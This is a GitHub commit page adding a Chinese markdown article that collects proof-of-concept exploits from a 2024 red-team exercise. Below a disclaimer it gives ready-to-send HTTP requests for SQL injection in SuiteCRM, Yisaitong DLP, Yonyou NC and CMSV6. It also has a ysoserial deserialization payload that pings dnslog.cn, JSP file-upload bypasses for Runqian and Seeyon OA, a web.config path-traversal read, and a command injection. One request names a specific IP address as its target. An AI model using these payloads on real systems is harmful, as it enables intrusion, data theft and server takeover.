-
Notifications
You must be signed in to change notification settings - Fork 401
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Upload new file: 2024HW 情报合集(二)附 poc.md via simpread
- Loading branch information
Showing
1 changed file
with
214 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,214 @@ | ||
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/clB6P1_DT4eMuURPMv-FBg) | ||
**免责声明** | ||
|
||
<table width="677"><tbody><tr><td valign="top" rowspan="5" colspan="1"><strong><strong>本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!</strong></strong></td></tr><tr></tr><tr></tr><tr></tr><tr></tr></tbody></table> | ||
|
||
各位大师傅不好意思,经发现下面 poc 有错,已增加和更新部分 poc。 | ||
|
||
一、SuiteCRM responseEntryPoint 存在 SQL 注入漏洞 | ||
|
||
``` | ||
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Connection: keep-alive | ||
``` | ||
|
||
二、亿赛通数据泄露防护 (DLP) 系统 NetSecConfigAjax 接口存在 SQL 注入漏洞 | ||
|
||
``` | ||
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 | ||
Host: | ||
Content-Type: application/x-www-form-urlencoded | ||
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- | ||
``` | ||
|
||
三、亿赛通数据泄露防护 (DLP) 系统 NoticeAjax 接口存在 SQL 注入漏洞 | ||
|
||
``` | ||
POST /CDGServer3/NoticeAjax;Service HTTP/1.1 | ||
Host: | ||
Cache-Control: max-age=0 | ||
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" | ||
Sec-Ch-Ua-Mobile: ?0 | ||
Sec-Ch-Ua-Platform: "Windows" | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
Sec-Fetch-Site: cross-site | ||
Sec-Fetch-Mode: navigate | ||
Sec-Fetch-User: ?1 | ||
Sec-Fetch-Dest: document | ||
Referer: | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
Priority: u=0, i | ||
Connection: close | ||
Content-Type: application/x-www-form-urlencoded | ||
Content-Length: 98 | ||
command=delNotice¬iceId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'-- | ||
``` | ||
|
||
四、用友 U8 Cloud MonitorServlet 存在反序列化漏洞 | ||
|
||
``` | ||
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser | ||
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 | ||
payload | ||
``` | ||
|
||
五、用友 NC 系统 blobRefClassSearch 接口中 pk_org 参数的 sql 注入漏洞 | ||
|
||
poc 暂未公布。 | ||
|
||
六、用友 NC querygoodsgridbycode 存在 SQL 注入漏洞 | ||
|
||
``` | ||
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1 | ||
Host: | ||
Accept-Encoding: gzip, deflate | ||
Upgrade-Insecure-Requests: 1 | ||
Pragma: no-cache | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
Cache-Control: no-cache | ||
``` | ||
|
||
七、通天星 CMSV6 车载定位监控平台 disable 存在 SQL 注入 | ||
|
||
``` | ||
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 | ||
``` | ||
|
||
八、通天星主动安全监控云平台远程代码执行漏洞 | ||
|
||
poc 暂未公布。 | ||
|
||
九、润乾报表 InputServlet 存在任意文件上传漏洞 | ||
|
||
``` | ||
POST /InputServlet?action=12 HTTP/1.1 | ||
Host: 120.55.41.98:6868 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | ||
Content-Type: multipart/form-data; boundary=00contentOboundary00 | ||
Connection: close | ||
Content-Length: 238 | ||
--00contentOboundary00 | ||
Content-Disposition: form-data; | ||
1024 | ||
--00contentOboundary00 | ||
Content-Disposition: form-data; /\..\\..\\..\12.jsp" | ||
Content-Type: image/jpeg | ||
test | ||
--00contentOboundary00-- | ||
``` | ||
|
||
十、天问物业 ERP 系统 AreaAvatarDownLoad 存在任意文件读取漏洞 | ||
|
||
``` | ||
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | ||
``` | ||
|
||
十一、 致远 OA fileUpload.do 前台文件上传绕过漏洞 | ||
|
||
1、上传图片马,返回 fileid 值 | ||
|
||
``` | ||
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1 | ||
Host: | ||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 | ||
Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30) | ||
Content-Length: 754 | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
png | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
false | ||
--00content0boundary00 | ||
Content-Disposition: form-data; Content-Type: Content-Type: application/pdf | ||
<% out.println("hello");%> | ||
--00content0boundary00-- | ||
``` | ||
|
||
2、修改文件后缀为 jsp | ||
|
||
``` | ||
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 | ||
Host: | ||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 | ||
Content-type: application/x-www-form-urlencoded | ||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) | ||
Content-Length: 64 | ||
method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp | ||
``` | ||
|
||
十二、福建科立讯通信 指挥调度平台 invite_one_member 存在远程命令执行漏洞 | ||
|
||
``` | ||
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60ech o%20test%3Etest.txt%60 HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Connection: keep-alive | ||
``` | ||
|
||
十三、福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞 | ||
|
||
``` | ||
POST /app/ext/ajax_users.php HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info | ||
Content-Type: application/x-www-form-urlencoded | ||
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- - | ||
``` | ||
|
||
十四、福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞 | ||
|
||
``` | ||
/app/ext/ajax_users.php | ||
``` | ||
|
||
十五、锐捷 RG-NBS2026G-P 交换机 WEB 管理 ping.htm 未授权访问漏洞 | ||
|
||
``` | ||
/safety/ping.htm | ||
``` | ||
|
||
关注公众号:**实战安全研究** |